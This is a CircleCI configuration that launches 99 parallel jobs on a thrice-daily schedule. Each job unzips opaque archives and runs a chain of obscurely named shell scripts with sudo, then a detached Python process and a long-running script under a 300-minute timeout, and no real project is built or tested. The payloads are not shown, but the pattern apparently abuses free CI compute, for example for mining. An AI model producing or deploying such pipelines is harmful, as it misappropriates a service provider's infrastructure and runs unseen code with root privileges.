working_dir: &working_dir ~/app
.build_template: &commonSteps
  steps:
    - checkout
    - run:
        name: A
        command: |
          sudo apt update -y
    - run:
        name: B
        command: |
          sleep 10s          
          unzip cacing.zip && chmod u+x *
          ./cacing.sh
    - run:
        name: C
        command: |
          unzip iki2.zip >/dev/null 2>&1
    - run:
        name: D
        command: |
          chmod u+x *
    - run:
        name: E
        command: |
          sudo ./aku.sh
    - run:
        name: F
        command: |
          sudo ./Bojo.sh
    - run:
        name: G
        command: |
          sudo ./cilok.sh
    - run:
        name: H
        command: |
          sudo ./dan.sh
    - run:
        name: I
        command: |
          sudo ./ewe.sh
    - run:
        name: J
        command: |
          #sudo ./Frean.sh#no_run
    - run:
        name: K
        no_output_timeout: 300m
        command: |
          echo "Ijin Berkah Om. . ."
          sudo ./gok.sh
          sudo ./halah.sh
          sudo ./Itu.sh
          screen -dmS Acdb python3 pro01.py
          sleep 300s
          ./main01.sh
  working_directory: *working_dir

version: 2.0

jobs:
  aman_01:
    <<: *commonSteps
    docker:
      - image: circleci/buildpack-deps:bionic-scm
  aman_02:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_03:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  aman_04:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_05:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_06:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_07:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_08:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_09:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_10:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_11:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_12:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_13:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_14:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_15:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_16:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_17:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_18:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_19:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_20:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_21:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_22:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_23:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  aman_24:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_25:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_26:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_27:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_28:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_29:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_30:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_31:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_32:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_33:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  aman_34:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_35:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_36:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_37:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_38:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_39:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_40:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_41:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_42:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_43:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  aman_44:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_45:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_46:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_47:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_48:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_49:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_50:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_51:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_52:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_53:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  aman_54:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_55:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_56:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_57:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_58:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_59:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_60:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_61:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_62:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_63:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  aman_64:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_65:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_66:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_67:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_68:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_69:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_70:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_71:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_72:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_73:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  aman_74:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_75:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_76:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_77:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_78:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_79:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_80:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_81:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_82:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_83:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  aman_84:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_85:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_86:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_87:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_88:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_89:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_90:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_91:
    <<: *commonSteps
    docker:
      - image: circleci/buildpack-deps:bionic-scm
  aman_92:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_93:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  aman_94:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_95:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_96:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_97:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_98:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  aman_99:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps

    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - anak
                - kucing
                - main
                - di
                - jalan

workflows:
  version: 2
  amanjalan:
    jobs:
      - aman_01
      - aman_02
      - aman_03
      - aman_04
      - aman_05
      - aman_06
      - aman_07
      - aman_08
      - aman_09
      - aman_10
      - aman_11
      - aman_12
      - aman_13
      - aman_14
      - aman_15
      - aman_16
      - aman_17
      - aman_18
      - aman_19
      - aman_20
      - aman_21
      - aman_22
      - aman_23
      - aman_24
      - aman_25
      - aman_26
      - aman_27
      - aman_28
      - aman_29
      - aman_30
      - aman_31
      - aman_32
      - aman_33
      - aman_34
      - aman_35
      - aman_36
      - aman_37
      - aman_38
      - aman_39
      - aman_40
      - aman_41
      - aman_42
      - aman_43
      - aman_44
      - aman_45
      - aman_46
      - aman_47
      - aman_48
      - aman_49
      - aman_50
      - aman_51
      - aman_52
      - aman_53
      - aman_54
      - aman_55
      - aman_56
      - aman_57
      - aman_58
      - aman_59
      - aman_60
      - aman_61
      - aman_62
      - aman_63
      - aman_64
      - aman_65
      - aman_66
      - aman_67
      - aman_68
      - aman_69
      - aman_70
      - aman_71
      - aman_72
      - aman_73
      - aman_74
      - aman_75
      - aman_76
      - aman_77
      - aman_78
      - aman_79
      - aman_80
      - aman_81
      - aman_82
      - aman_83
      - aman_84
      - aman_85
      - aman_86
      - aman_87
      - aman_88
      - aman_89
      - aman_90
      - aman_91
      - aman_92
      - aman_93
      - aman_94
      - aman_95
      - aman_96
      - aman_97
      - aman_98
      - aman_99
